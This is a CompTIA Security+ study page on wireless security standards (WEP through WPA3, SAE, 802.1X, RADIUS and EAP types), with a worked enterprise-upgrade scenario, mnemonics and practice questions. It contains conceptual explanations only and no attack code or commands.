Wireless Security Standards
Understanding WPA3, AAA/RADIUS, cryptographic protocols, and authentication methods for wireless networks including 802.1X, EAP types, and enterprise wireless security.
Understanding Wireless Security Standards
Wireless security standards define how networks authenticate users and encrypt traffic. Understanding the evolution from WEP to WPA3 and the role of enterprise authentication (802.1X/RADIUS) is essential for securing wireless networks.
Key wireless security components: • WPA3 — Latest wireless security standard • 802.1X — Port-based network access control • RADIUS — AAA server for authentication • EAP — Extensible Authentication Protocol types
The 2017 KRACK (Key Reinstallation Attack) vulnerability affected all WPA2 implementations, allowing attackers to decrypt wireless traffic. This accelerated WPA3 development, which includes protections against such attacks and provides forward secrecy.
Wireless security has evolved significantly—using outdated protocols creates serious vulnerabilities.
Why This Matters for the Exam
Wireless security standards are heavily tested on SY0-701 because proper implementation is critical. Questions cover WPA versions, EAP types, and enterprise authentication architecture.
Understanding wireless standards helps with network security design, compliance requirements, and vulnerability assessment. Weak wireless security = network compromise.
The exam tests recognition of standards, their security features, and appropriate implementation.
Deep Dive
How Has Wireless Security Evolved?
Wireless Security Timeline:
| Standard | Era | Security Level |
|---|---|---|
| WEP | 1999 | Broken (never use) |
| WPA | 2003 | Legacy (avoid) |
| WPA2 | 2004 | Standard (acceptable) |
| WPA3 | 2018 | Current (preferred) |
Why WEP Failed:
WEP weaknesses: - Static encryption keys - Weak IV (initialization vector) - No integrity protection - Can be cracked in minutes NEVER use WEP - completely broken
What Are WPA2 and WPA3?
WPA2 Features:
| Feature | Description |
|---|---|
| Encryption | AES-CCMP (strong) |
| Authentication | PSK or Enterprise |
| Key Management | 4-way handshake |
| Weakness | Offline dictionary attacks |
WPA3 Improvements:
| Feature | Benefit |
|---|---|
| SAE (Dragonfly) | Replaces PSK, resists offline attacks |
| Forward secrecy | Past sessions protected if key exposed |
| 192-bit security | Enterprise mode strength |
| PMF required | Management frame protection |
| Easy connect | QR code device onboarding |
WPA2 vs WPA3 Comparison:
| Aspect | WPA2 | WPA3 |
|---|---|---|
| Personal auth | PSK (vulnerable) | SAE (Dragonfly) |
| Enterprise auth | 802.1X | 802.1X (192-bit option) |
| Offline attacks | Vulnerable | Protected |
| Forward secrecy | No | Yes |
| Management frames | Optional protection | Required protection |
SAE (Simultaneous Authentication of Equals):
WPA2-PSK problem: - Capture 4-way handshake - Offline dictionary attack - Eventually crack password WPA3-SAE solution: - Zero-knowledge proof - Cannot capture crackable handshake - Each session unique - Offline attacks don't work
What Is 802.1X?
802.1X provides port-based network access control for both wired and wireless networks.
802.1X Components:
| Component | Role |
|---|---|
| Supplicant | Client requesting access |
| Authenticator | AP or switch (enforcer) |
| Authentication Server | RADIUS server (decider) |
802.1X Architecture:
[Supplicant] [Authenticator] [Auth Server]
(Client/Device) (AP/Switch) (RADIUS)
| | |
|──── EAP Request ────>| |
| |──── RADIUS Request ───>|
| | |
| |<─── RADIUS Response ───|
|<─── EAP Response ────| |
| | |
| (If approved: port opened, access granted) |What Is RADIUS?
RADIUS (Remote Authentication Dial-In User Service) provides AAA services.
AAA Functions:
| Function | Purpose |
|---|---|
| Authentication | Verify identity (who are you?) |
| Authorization | Grant permissions (what can you do?) |
| Accounting | Track usage (what did you do?) |
RADIUS in Wireless:
User connects to WiFi
↓
AP sends credentials to RADIUS
↓
RADIUS checks against directory (AD, LDAP)
↓
RADIUS returns accept/reject
↓
AP grants or denies access
↓
RADIUS logs the session (accounting)RADIUS vs TACACS+:
| Aspect | RADIUS | TACACS+ |
|---|---|---|
| Protocol | UDP | TCP |
| Encryption | Password only | Full packet |
| AAA separation | Combined | Separate |
| Primary use | Network access | Device admin |
What Are EAP Types?
EAP (Extensible Authentication Protocol) provides the authentication framework for 802.1X.
Common EAP Types:
| EAP Type | Certificates | Security |
|---|---|---|
| EAP-TLS | Client + Server | Highest |
| PEAP | Server only | High |
| EAP-TTLS | Server only | High |
| EAP-FAST | Optional (PAC) | High |
| LEAP | None | Weak (avoid) |
EAP-TLS:
Requirements: - Server certificate - Client certificate (each device) - PKI infrastructure Process: 1. Server presents certificate 2. Client validates server 3. Client presents certificate 4. Server validates client 5. Mutual authentication complete Pros: Strongest security Cons: Certificate management overhead
PEAP (Protected EAP):
Requirements: - Server certificate - Username/password (typically) Process: 1. TLS tunnel established (server cert) 2. Credentials sent inside tunnel 3. Inner authentication (often MS-CHAPv2) Pros: No client certs needed Cons: Password-based
What Are Personal vs Enterprise Modes?
Personal Mode (PSK):
WPA2-Personal / WPA3-Personal: - Shared password - All users same key - No individual identity - Good for home/small office Limitation: Cannot revoke individual access
Enterprise Mode (802.1X):
WPA2-Enterprise / WPA3-Enterprise: - Individual credentials - RADIUS authentication - Per-user/device keys - Audit trail - Required for business Benefit: Revoke individual access, track usage
Mode Comparison:
| Aspect | Personal | Enterprise |
|---|---|---|
| Authentication | Shared password | Individual credentials |
| Key derivation | Same for all | Unique per session |
| User tracking | No | Yes |
| Scalability | Limited | Enterprise |
| Complexity | Simple | Requires RADIUS |
How CompTIA Tests This
Example Analysis
Scenario: A company is upgrading their wireless network. Current state: WPA2-Personal with a shared password. Requirements: individual user authentication, audit logging, ability to revoke access, and strongest available security.
Analysis - Wireless Security Upgrade:
Current State Assessment:
WPA2-Personal: ✗ Shared password (everyone knows) ✗ Cannot track individual users ✗ Cannot revoke single user ✗ Vulnerable to offline attacks ✗ No audit trail
Recommended Architecture:
Standard: WPA3-Enterprise
Why WPA3: ✓ SAE protects against offline attacks ✓ Forward secrecy ✓ Management frame protection ✓ Latest security standard Why Enterprise: ✓ Individual authentication ✓ Per-user session keys ✓ Audit logging via RADIUS ✓ Can revoke individual access
Authentication Architecture:
[Employees] [Access Points] [RADIUS] [AD]
(Supplicants) (Authenticators) (Auth Server) (Directory)
| | | |
|─── Connect to SSID ──────>| | |
|<── EAP Identity Request ──| | |
|─── Username ─────────────>|── RADIUS Request ─────>| |
| | |─── Validate ─>|
| | |<── Response ──|
|<── Certificate ───────────|<── EAP-TLS ───────────| |
|─── Certificate ──────────>|─────────────────────────────────────────>
| | | |
| (Mutual authentication complete - access granted) |EAP Type Selection:
| Option | Security | Complexity | Recommendation |
|---|---|---|---|
| EAP-TLS | Highest | High (client certs) | If PKI exists |
| PEAP | High | Medium | Most common |
| EAP-TTLS | High | Medium | Alternative to PEAP |
Recommendation: PEAP with WPA3
Justification: - No client certificates needed - Users authenticate with AD credentials - Server certificate verifies AP authenticity - Balance of security and usability Configuration: - Server: FreeRADIUS or NPS - Server certificate from internal CA - Inner auth: MSCHAPv2 with AD - WPA3-Enterprise mode on APs
Implementation:
| Component | Configuration |
|---|---|
| APs | WPA3-Enterprise, RADIUS client |
| RADIUS | Integrate with Active Directory |
| Certificate | Server cert for EAP |
| Users | AD credentials (existing) |
| Logging | RADIUS accounting enabled |
Access Control:
New employee: Add to AD → Automatic access Terminated: Disable AD account → Immediate revocation Guest: Separate SSID, captive portal Contractor: Time-limited AD account
Key insight: WPA3-Enterprise with PEAP provides individual authentication via existing AD credentials, audit logging through RADIUS accounting, and strong security without the complexity of client certificates. This balances security requirements with operational feasibility.
Key Terms
Common Mistakes
Exam Tips
Memory Trick
Wireless Evolution: "WEP = Worst Ever Protocol" (broken) "WPA = Was a Patch, Acceptable briefly" "WPA2 = Was Pretty Adequate" "WPA3 = Way Preferred Always"
- •802.1X Components - "SAA":
- •Supplicant = Seeking access (client)
- •Authenticator = AP/switch (enforcer)
- •Authentication server = RADIUS (decider)
EAP Types: "TLS = Two certificates (client + server)" "PEAP = Password in tunnel (server cert only)"
- •RADIUS = AAA:
- •Authentication = Who are you?
- •Authorization = What can you do?
- •Accounting = What did you do?
Personal vs Enterprise: "Personal = Password shared" "Enterprise = Each user individual"
WPA3 SAE Benefit: "SAE = Stops Attackers from External cracking" Offline dictionary attacks don't work
Test Your Knowledge
Q1.Which WPA3 feature protects against offline dictionary attacks?
Q2.In 802.1X architecture, which component makes the authentication decision?
Q3.Which EAP type requires certificates on BOTH client and server?
Want more practice with instant AI feedback?
Continue Learning
Ready for the Exam?
See exactly where you stand on this concept and 182 others.
99% pass rate · Pass guarantee